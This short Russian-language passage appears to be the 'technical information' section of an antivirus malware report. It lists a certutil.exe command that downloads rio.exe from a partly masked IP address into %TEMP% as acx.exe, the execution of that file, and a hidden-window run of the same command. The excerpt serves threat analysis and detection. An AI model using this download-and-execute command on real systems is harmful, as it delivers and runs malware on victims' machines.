Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://2.##.214.182/rio.exe %TEMP%\acx.exe
- %TEMP%\acx.exe
- http://2.##.214.182/rio.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://2.##.214.182/rio.exe %TEMP%\acx.exe' (со скрытым окном)